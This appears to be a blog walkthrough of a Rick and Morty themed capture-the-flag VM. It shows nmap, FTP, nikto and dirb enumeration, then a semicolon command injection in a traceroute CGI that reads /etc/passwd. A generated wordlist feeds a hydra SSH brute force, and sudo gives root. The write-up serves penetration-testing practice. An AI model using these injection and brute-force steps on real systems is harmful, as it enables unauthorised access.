Lets first start off with a nmap scan of the remote host.
root@ubuntu:~# nmap -p0-65355 -sV -O -sC -T5 192.168.0.48
Starting Nmap 7.60 ( https://nmap.org ) at 2019-10-08 21:30 MDT
Nmap scan report for 192.168.0.48
Host is up (0.00059s latency).
Not shown: 65330 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 0 0 42 Aug 22 2017 FLAG.txt
|_drwxr-xr-x 2 0 0 6 Feb 12 2017 pub
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.0.42
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh?
| fingerprint-strings:
| NULL:
|_ Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic x86_64)
80/tcp open http Apache httpd 2.4.27 ((Fedora))
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.27 (Fedora)
|_http-title: Morty's Website
9090/tcp open http Cockpit web service
|_http-title: Did not follow redirect to https://192.168.0.48:9090/
13337/tcp open unknown
| fingerprint-strings:
| NULL:
|_ FLAG:{TheyFoundMyBackDoorMorty}-10Points
22222/tcp open ssh OpenSSH 7.5 (protocol 2.0)
| ssh-hostkey:
| 2048 b4:11:56:7f:c0:36:96:7c:d0:99:dd:53:95:22:97:4f (RSA)
| 256 20:67:ed:d9:39:88:f9:ed:0d:af:8c:8e:8a:45:6e:0e (ECDSA)
|_ 256 a6:84:fa:0f:df:e0:dc:e2:9a:2d:e7:13:3c:e7:50:a9 (EdDSA)
60000/tcp open unknown
| fingerprint-strings:
| NULL, ibm-db2:
|_ Welcome to Ricks half baked reverse shell...
61960/tcp filtered unknown
64071/tcp filtered unknown
MAC Address: 08:00:27:FE:68:51 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 228.53 seconds
root@ubuntu:~#
We did a full nmap scan and found some interesting stuff. first thing to note is that it looks like we have already found two flags according to the nmap output. the first one resides on the remote FTP service, lets enumerate the service and see what we can come up with.
root@ubuntu:~# ftp ftp> open 192.168.0.48 Connected to 192.168.0.48. 220 (vsFTPd 3.0.3) Name (192.168.0.48:root): anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. -rw-r--r-- 1 0 0 42 Aug 22 2017 FLAG.txt drwxr-xr-x 2 0 0 6 Feb 12 2017 pub 226 Directory send OK. ftp> get FLAG.txt local: FLAG.txt remote: FLAG.txt 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for FLAG.txt (42 bytes). 226 Transfer complete. 42 bytes received in 0.03 secs (1.5057 kB/s) ftp> cd pub 250 Directory successfully changed. ftp> ls 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. 226 Directory send OK. ftp> cd .. 250 Directory successfully changed. ftp> exit 221 Goodbye. root@ubuntu:~#
We downloaded the flag file now all we need to do is cat the contents to see what it contains.
root@ubuntu:~# cat FLAG.txt
FLAG{Whoa this is unexpected} - 10 Points
root@ubuntu:~#
Well we found our first flag and scored 10 points. The next port (13337) has another flag we need to capture lets try and telnet in to the remote service on port 313337 and see what we get.
root@ubuntu:~# telnet 192.168.0.48 13337
Trying 192.168.0.48...
Connected to 192.168.0.48.
Escape character is '^]'.
FLAG:{TheyFoundMyBackDoorMorty}-10Points
Connection closed by foreign host.
root@ubuntu:~#
We found another flag and gained another 10 points lets move on to other ports so we can enumerate the remaining services. The next port we will enumerate is good old port 80. From the nmap scan we got some information but now its time to connect to the website and see what it is all about.
Nothing interesting on the front page and nothing found when I went to view-source. Lets fire up nikto and see if it finds anything of any interest.
root@ubuntu:~/src/nikto/program# ./nikto.pl -host 192.168.0.48 - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 192.168.0.48 + Target Hostname: 192.168.0.48 + Target Port: 80 + Start Time: 2019-10-08 22:14:39 (GMT-6) --------------------------------------------------------------------------- + Server: Apache/2.4.27 (Fedora) + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + Apache/2.4.27 appears to be outdated (current is at least Apache/2.4.39). Apache 2.2.34 is the EOL for the 2.x branch. + Allowed HTTP Methods: GET, POST, OPTIONS, HEAD, TRACE + OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST + OSVDB-3268: /passwords/: Directory indexing found. + OSVDB-3092: /passwords/: This might be interesting. + OSVDB-3268: /icons/: Directory indexing found. + OSVDB-3233: /icons/README: Apache default file found. + 8755 requests: 0 error(s) and 10 item(s) reported on remote host + End Time: 2019-10-08 22:15:35 (GMT-6) (56 seconds) --------------------------------------------------------------------------- + 1 host(s) tested root@ubuntu:~/src/nikto/program#
Nikto came back with some interesting results. We see in the output that the directory '/passwords/' exists on the system lets move to the web browser and get it out.
Looks like we found another flag and a passwords.html file in the directory. The flag says:
FLAG{Yeah d- just don't do it.} - 10 Points
If we check out passwords.html we are greeted with a message.
My first instinct when I visit these web pages is to view source and look for comments or code which reveals information. This is exactly what is contained here a password within the html file.
Well now we have a password "winter", but i'm not done enumerating the web site. my next task is to run dirb against the web host to try and uncover more hidden directories.
root@ubuntu:~/src/nikto/program# dirb http://192.168.0.48
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue Oct 8 22:23:57 2019
URL_BASE: http://192.168.0.48/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.0.48/ ----
+ http://192.168.0.48/cgi-bin/ (CODE:403|SIZE:217)
+ http://192.168.0.48/index.html (CODE:200|SIZE:326)
==> DIRECTORY: http://192.168.0.48/passwords/
+ http://192.168.0.48/robots.txt (CODE:200|SIZE:126)
---- Entering directory: http://192.168.0.48/passwords/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Tue Oct 8 22:23:58 2019
DOWNLOADED: 4612 - FOUND: 3
root@ubuntu:~/src/nikto/program#
As I suspected there were more directories hidden from view. I first tried to visit cgi-bin but got a 403 forbidden so I moved on to the robots.txt file.
We have two directories /cgi-bin/root_shell.cgi and /cgi-bin/tracertool.cgi lets visit both of these and see what it brings.
Well that led nowhere lets try the second script.
Here we have an application which performs a traceroute on a specific host. My first thought on this is command injection exploit. We can try and run commands by using the ';' to chain commands together.
127.0.0.1;less /etc/passwd traceroute to 127.0.0.1 (127.0.0.1), 30 hops max, 60 byte packets 1 localhost (127.0.0.1) 0.034 ms 0.011 ms 0.008 ms root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin systemd-coredump:x:999:998:systemd Core Dumper:/:/sbin/nologin systemd-timesync:x:998:997:systemd Time Synchronization:/:/sbin/nologin systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin systemd-resolve:x:193:193:systemd Resolver:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin polkitd:x:997:996:User for polkitd:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin cockpit-ws:x:996:994:User for cockpit-ws:/:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin chrony:x:995:993::/var/lib/chrony:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin RickSanchez:x:1000:1000::/home/RickSanchez:/bin/bash Morty:x:1001:1001::/home/Morty:/bin/bash Summer:x:1002:1002::/home/Summer:/bin/bash apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
Well we found three users: RichSanchez, Morty and Summer. If you remeber we got a password through view-source which is winter so i suspect it a login to one of the users on the system. nmy next task is to try and login to ssh with the password and the user Summer.
root@ubuntu:~# ssh Summer@192.168.0.48 ssh_exchange_identification: Connection closed by remote host root@ubuntu:~#
It gives this error on all Usernames I tried so I went back to my nmap scan results and found that SSH was also running on port 22222. So I try this next.
root@ubuntu:~# ssh -p 22222 Summer@192.168.0.48 Summer@192.168.0.48's password: Last login: Wed Oct 9 13:18:38 2019 from 192.168.0.42 [Summer@localhost ~]$
It worked. now we have a shell on the remote system. if we ls the directory we find another flag
[Summer@localhost ~]$ more FLAG.txt
FLAG{Get off the high road Summer!} - 10 Points
[Summer@localhost ~]$
I started to explore the system and went and listed the /home directories of RichSanchez and Morty were there where some interesting files waiting. First in the RickSanchez directory we have no flags but a program named safe. on to the Morty directory we have two files journal.txt.zip and Safe_Password.jpg. The first thing we need to do is copy these files to the Summer home directory so we can execute all of them.
The zip archive has a password which is contained in Safe_Password.jpg you can extract the password by using the head command like so.
[Summer@localhost Morty]$ head -n 1 Safe_Password.jpg ���� JFIF ``���ExifMM J R ( �i Z` ` � � P� 8��8 The Safe Password: File: /home/Morty/journal.txt.zip. Password: Meeseek8BIM 8BIM % � �ُ� �� ���B~� 8 P " �� [Summer@localhost Morty]$
The password is 'Meeseek' so once we unzip the jounral.txt we find some interesting information.
[Summer@localhost ~]$ more journal.txt
Monday: So today Rick told me huge secret. He had finished his flask and was on to commercial grade paint solvent. He spluttered something about a safe, and a password. Or mayb
e it was a safe password... Was a password that was safe? Or a password to a safe? Or a safe password to a safe?
Anyway. Here it is:
FLAG: {131333} - 20 Points
[Summer@localhost ~]$
We got another flag with another password '131333'. We found a program in the RickSanchez directory called 'safe' if we copy the program to Summers home directory and run it we get the following.
[Summer@localhost ~]$ ./safe
Past Rick to present Rick, tell future Rick to use GOD DAMN COMMAND LINE AAAAAHHAHAGGGGRRGUMENTS!
[Summer@localhost ~]$
[Summer@localhost ~]$ ./safe 131333
decrypt: FLAG{And Awwwaaaaayyyy we Go!} - 20 Points
Ricks password hints:
(This is incase I forget.. I just hope I don't forget how to write a script to generate potential passwords. Also, sudo is wheely good.)
Follow these clues, in order
1 uppercase character
1 digit
One of the words in my old bands name.� @
[Summer@localhost ~]$
We got another flag and some instructions on how to generate passwords and a sudo reference. This is all for the user RickSanchez. So our next task is to create a wordlist with the following rules applied: 1 uppercase, 1 digit and a word.
I had to google to see what his bands name was which is "The Flesh Curtains" so I fired up perl and wrote a small script to generate the passwords.
#!/usr/bin/env perl
use strict;
use warnings;
# The Flesh Curtains
my @words = ('The','Flesh','Curtains');
for my $alpha ('A'..'Z') {
for my $num (0..9) {
foreach my $word (@words) {
print $alpha.$num.$word."\n";
}
}
}
Its now time to use hydra and brute force the ssh password for the user RickSanchez.
root@ubuntu:~# hydra -l RickSanchez -P morty.txt ssh://192.168.0.48:22222 Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (http://www.thc.org/thc-hydra) starting at 2019-10-08 20:41:56 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore [DATA] max 16 tasks per 1 server, overall 16 tasks, 780 login tries (l:1/p:780), ~49 tries per task [DATA] attacking ssh://192.168.0.48:22222/ [STATUS] 264.00 tries/min, 264 tries in 00:01h, 524 to do in 00:02h, 16 active [22222][ssh] host: 192.168.0.48 login: RickSanchez password: P7Curtains 1 of 1 target successfully completed, 1 valid password found [WARNING] Writing restore file because 8 final worker threads did not complete until end. [ERROR] 8 targets did not resolve or could not be connected [ERROR] 16 targets did not complete Hydra (http://www.thc.org/thc-hydra) finished at 2019-10-08 20:44:05 root@ubuntu:~#
The password was P7Curtains so now lets login and see what we can find.
root@ubuntu:~# ssh -p 22222 RickSanchez@192.168.0.48
RickSanchez@192.168.0.48's password:
Last failed login: Wed Oct 9 13:44:03 AEDT 2019 from 192.168.0.42 on ssh:notty
There were 1217 failed login attempts since the last successful login.
Last login: Thu Sep 21 09:45:24 2017
[RickSanchez@localhost ~]$ ls -l
total 0
drwxr-xr-x. 2 RickSanchez RickSanchez 18 Sep 21 2017 RICKS_SAFE
drwxrwxr-x. 2 RickSanchez RickSanchez 26 Aug 18 2017 ThisDoesntContainAnyFlags
[RickSanchez@localhost ~]$ sudo -l
[sudo] password for RickSanchez:
Matching Defaults entries for RickSanchez on localhost:
!visiblepw, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE
LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User RickSanchez may run the following commands on localhost:
(ALL) ALL
[RickSanchez@localhost ~]$ id
uid=1000(RickSanchez) gid=1000(RickSanchez) groups=1000(RickSanchez),10(wheel) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[RickSanchez@localhost ~]$ sudo -s
[root@localhost RickSanchez]# id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[root@localhost RickSanchez]#
We got root! that was a fun challenge.
No comments:
Post a Comment